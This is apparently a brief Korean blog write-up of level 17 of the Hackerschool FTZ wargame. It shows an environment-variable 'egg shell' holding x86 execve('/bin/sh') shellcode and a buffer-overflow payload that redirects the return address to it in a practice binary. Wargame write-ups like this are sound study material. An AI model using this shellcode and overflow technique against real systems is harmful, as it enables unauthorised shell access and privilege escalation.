해커스쿨 FTZ - 17단계
이번에는 shell 함수가 사라졌다. 그래서 이번에는 저번부터 우려먹는 페이로드에 에그셸 주소를 넣어 사용해야 할것같다.
11단계에서 사용했던 그 에그셸, export egg=`python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
를 넣어준 뒤
해당 환경변수 주소를 알아내자.
그래서 다음의 페이로드를 통해 어택에 성공하였다!
(python -c 'print "A"*40+"\x3a\xff\xff\xbf"';cat)|./attackme
Comments
Post a Comment